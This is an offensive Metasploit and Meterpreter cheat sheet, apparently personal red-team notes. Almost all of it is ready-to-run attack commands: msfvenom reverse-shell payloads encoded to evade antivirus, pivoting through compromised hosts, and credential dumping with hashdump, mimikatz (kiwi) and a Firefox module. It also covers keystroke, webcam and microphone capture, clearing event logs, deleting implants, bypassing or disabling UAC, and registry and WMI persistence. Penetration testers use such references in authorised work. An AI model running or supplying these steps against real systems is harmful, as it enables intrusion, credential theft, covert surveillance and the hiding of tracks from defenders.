Metasploit
Port Scan
use auxiliary/scanner/portscan/
tcp
set RHOSTS 10.10.10.0/24
run
DNS Enumeration
use auxiliary/gather/dns_enum
set DOMAIN target.tgt
run
Host FTP Server
use auxiliary/server/ftp
set FTPROOT /tmp/ftproot
run
Proxy Server
Any proxied traffic that matches the subnet of a route will be routed through the session specified by route.
Use proxychains configured for socks4 to route any application's traffic through a Meterpreter session.
#comprimised host has 10.10.120.20 ip want to proxy traffic through meterpreter
route add 10.10.120.0/24 4
use auxiliary/server/socks_proxy
set Version 4a
set SRVPORT 9050
run
msfvenom
The msfvenom tool can be used to generate Metasploit payloads (such as Meterpreter) as standalone files and optionally encode them.
List Payloads
msfvenom -l payloads
Basic Examples
msfvenom -p windows/meterpreter/
reverse_tcp -f exe LHOST=10.1.1.1
LPORT=4444 > met.exe
Format Options
--help-formats #List available output formats
exe #Executable
pl #Perl
rb #Ruby
raw #Raw Shellcode
c #C Code
Encoders
See all encoders
msfvenom -l encoders
Basic Example:
msfvenom -p windows/meterpreter/
reverse_tcp -i 5 -e x86/shikata_ga_nai -f
exe LHOST=10.1.1.1 LPORT=4444 > mal.exe
Meterpreter
Core commands will be helpful to navigate and interact with the target system. Below are some of the most commonly used.
Remember to check all available commands running the help command once a Meterpreter session has started.
Post Exploitation Modules Reference
https://www.offensive-security.com/metasploit-unleashed/post-module-reference/
Core commands
background
: Backgrounds the current sessionexit
: Terminate the Meterpreter sessionguid
: Get the session GUID (Globally Unique Identifier)help
: Displays the help menuinfo
: Displays information about a Post moduleirb
: Opens an interactive Ruby shell on the current sessionload
: Loads one or more Meterpreter extensionsmigrate
: Allows you to migrate Meterpreter to another processrun
: Executes a Meterpreter script or Post modulesessions
: Quickly switch to another session
File system commands
cd
: Will change directoryls
: Will list files in the current directory (dir will also work)pwd
: Prints the current working directoryedit
: will allow you to edit a filecat
: Will show the contents of a file to the screenrm
: Will delete the specified filesearch
: Will search for filesupload
: Will upload a file or directorydownload
: Will download a file or directory
Networking commands
arp
: Displays the host ARP (Address Resolution Protocol) cacheifconfig
: Displays network interfaces available on the target systemnetstat
: Displays the network connectionsportfwd
: Forwards a local port to a remote serviceroute
: Allows you to view and modify the routing table
System commands
clearev
: Clears the event logsexecute
: Executes a commandgetpid
: Shows the current process identifiergetuid
: Shows the user that Meterpreter is running askill
: Terminates a processpkill
: Terminates processes by nameps
: Lists running processesreboot
: Reboots the remote computershell
: Drops into a system command shellshutdown
: Shuts down the remote computersysinfo
: Gets information about the remote system, such as OS
Others Commands (these will be listed under different menu categories in the help menu)
idletime
: Returns the number of seconds the remote user has been idlekeyscan_dump
: Dumps the keystroke bufferkeyscan_start
: Starts capturing keystrokeskeyscan_stop
: Stops capturing keystrokesscreenshare
: Allows you to watch the remote user's desktop in real timescreenshot
: Grabs a screenshot of the interactive desktoprecord_mic
: Records audio from the default microphone for X secondswebcam_chat
: Starts a video chatwebcam_list
: Lists webcamswebcam_snap
: Takes a snapshot from the specified webcamwebcam_stream
: Plays a video stream from the specified webcamgetsystem
: Attempts to elevate your privilege to that of local systemhashdump
: Dumps the contents of the SAM database
Modules
Kiwi Commands
Command Description
------- -----------
creds_all Retrieve all credentials (parsed)
creds_kerberos Retrieve Kerberos creds (parsed)
creds_msv Retrieve LM/NTLM creds (parsed)
creds_ssp Retrieve SSP creds
creds_tspkg Retrieve TsPkg creds (parsed)
creds_wdigest Retrieve WDigest creds (parsed)
dcsync Retrieve user account information via DCSync (unparsed)
dcsync_ntlm Retrieve user account NTLM hash, SID and RID via DCSync
golden_ticket_create Create a golden kerberos ticket
kerberos_ticket_list List all kerberos tickets (unparsed)
kerberos_ticket_purge Purge any in-use kerberos tickets
kerberos_ticket_use Use a kerberos ticket
kiwi_cmd Execute an arbitary mimikatz command (unparsed)
lsa_dump_sam Dump LSA SAM (unparsed)
lsa_dump_secrets Dump LSA secrets (unparsed)
password_change Change the password/hash of a user
wifi_list List wifi profiles/creds for the current user
wifi_list_shared List shared wifi profiles/creds (requires SYSTEM)
Although all these commands may seem available under the help menu, they may not all work. For example, the target system might not have a webcam, or it can be running on a virtual machine without a proper desktop environment.
New Meterpreter Session Steps
Assuming you gained access, inserted AV Path Exception, wrote implant to disk and executed to catch you callback
getuid #see your user context
getpid #identify pid you are running as (should be the pid of your msfvenom implant named whatever you assigned)
getprivs #see enabled process privileges
ps #view the whole process list and pick and svchost process within the same user context, get its pid number
migrate XXXX #to the pid of the svchost process
getpid #confirm new pid
ps #ensure it is of the correct process
del /path/to/implant #remove implant artifact from disk
Now you are set up and running as a thread in the address space of the
svchost.exe
process
Accessing the Filesystem
Common commands include
cd - change directory on the target
cat - read and output to stdout the contents of a file
del - delete a file on the target
edit - edit a file with vim
ls - list files in current directory
mkdir - make a directory on the target system
rmdir - remove directory on the target system
File collect with meterpreter
download
andupload
commandsEnsure you are escaping the windows ""
Example:
download C:\\Users\\Administrator\\Desktop\\secret.txt
Harvest Credentials
One way to try and harvest come credentials is with the hashdump module
run post/windows/gather/hashdump
The output of each line is in the following format:
Username:SID:LM hash:NTLM hash:::
another method that can yeild more credentials (especially on the domain controller) is:
run post/windows/gather/credentials/credential_collector
Execute a program
The
execute
command allows us to start remote processesexecute
flags-H Create the process hidden from view
-a Arguments to pass to the command
-i Interact with the process after creating it
-m Execute from memory
-t Execute process with currently impersonated thread token
-s Execute process in a given session as the session user
Regarding the last option
-s
, we can find out the available sessions by using theenumdesktops
-command. The following example does that and then executes calc.exe on session 1:
enumdesktops
Desktops
--------
Session Station Name
1 WinSta0 Default
1 WinSta0 Winlogon
meterpreter> execute -s 1 -f calc.exe
Post Modules for Windows Survey
meterpreter > run post/windows/gather/arp_scanner RHOSTS=192.168.1.0/24
-----------------------------------------------------------------------
meterpreter > run post/windows/gather/checkvm
-----------------------------------------------------------------------
meterpreter > run post/windows/gather/credentials/credential_collector
**ENSURE SYSTEM before running
-----------------------------------------------------------------------
**ENSURE you migrate to a user process before running dumplinks**
meterpreter > run post/windows/manage/migrate
meterpreter > run post/windows/gather/dumplinks
-----------------------------------------------------------------------
meterpreter > run post/windows/gather/enum_applications
-----------------------------------------------------------------------
meterpreter > run post/windows/gather/enum_logged_on_users
-----------------------------------------------------------------------
meterpreter > run post/windows/gather/enum_shares
-----------------------------------------------------------------------
meterpreter > run post/windows/gather/enum_snmp
-----------------------------------------------------------------------
meterpreter > run post/windows/gather/hashdump
**ENSURE SYSTEM before running
-----------------------------------------------------------------------
meterpreter > run post/windows/gather/usb_history
-----------------------------------------------------------------------
msf > use post/multi/recon/local_exploit_suggester
set SESSION X
SHOWDESCRIPTION true
-----------------------------------------------------------------------
msf > use post/recon/outbound_ports
Winenum Windows Built In enumeration Script
from your meterpreter prompt:
meterpreter> run winenum
This will use net, netsh, and wmic commands to enumerate the target machine.
Note: Each individual command in this script will have its output stored in the path output in the line starting with 'Output of each individual command is saved to '.
Clearing the Event Log
from a meterpreter prompt
meterpreter> clearev
Meterpreter Extensions
kiwi module
load kiwi
help kiwi
Powershell Extension
meterpreter > load powershell
Loading extension powershell...Success.
meterpreter > powershell_shell
PS >
Powershell Commands from Meterpreter
run a powershell command as a "oneshot" from a meterpreter shell
execute -if powershell.exe -a "dir"
execute -if powershell.exe -a "net group"
execute -if powershell.exe -a 'net user /domain'
Metasploit imperssonate
Load incognito
list_tokens -g
impersonate_token "BUILTIN\Administrators"
Upgrade shell to meterpreter
use multi/manage/shell_to_meterpreter
set SESSION
set LHOST
set LPORT
run
Firefox Post Exploitation
use post/multi/gather/firefox_creds
can be run as non Administrator or as Admin, registry information gets pulled as Admin
Routing
Set route
route add <subnet / host ip> <subnetmask> <session id>
Autoroute module
use multi/manage/autoroute
Run autoroute
run autoroute -s 10.100.11.0/24
Create port forward
Portfwd add -l <LOCAL PORT> -p <REMOTE PORT> -r <REMOTE HOST>
UAC Escalation
use exploit windows/local/bypassuac_windows_store_reg
set payload windows/x64/meterpreter/reverse_tcp
set LHOST 10.10.10.10
set LPORT 8080
set SESSION 2
run
Change UAC to not Notify
Need to be admin
#check registry key first
Get-ItemProperty -Path REGISTRY::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System
#look for:
ConsentPromptBehaviorAdmin
ConsentPromptBehaviorUser
#Change if it is set to 1 or 2
Set-ItemProperty -Path REGISTRY::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System -Name ConsentPromptBehaviorAdmin -Value 0
Disable LUA
EnableLUA specifies whether Windows User Account Controls (UAC) notifies the user when programs try to make changes to the computer. UAC was formerly known as Limited User Account (LUA).
#check registry key first
Get-ItemProperty -Path REGISTRY::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System
#look for:
EnableLUA 1
#now set to 0
Set-ItemProperty -Path REGISTRY::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System -Name EnableLUA -Value 0
#will need to restart before changes are applied, thus ensure WMI Event Subscription Persistance or Registry is set up first
Persistance Modules
Registry Run Key
use exploit/windows/registry/local/registry_persistence
Ensure to set the
RUN_NAME
at a minimumWMI Event Subscription Persistance
use exploit/windows/local/wmi_persistence
Ensure failed login auditing is enabled on target
To enable:
auditpol.exe /set /subcategory:Logon /failure:Enable
Event ID for a failed logon is
4625
Ensure to set the
USERNAME_TRIGGER
andSESSION
at a minimumCannot be run as SYSTEM or USER needs to be run with ADMINISTRATOR
Last updated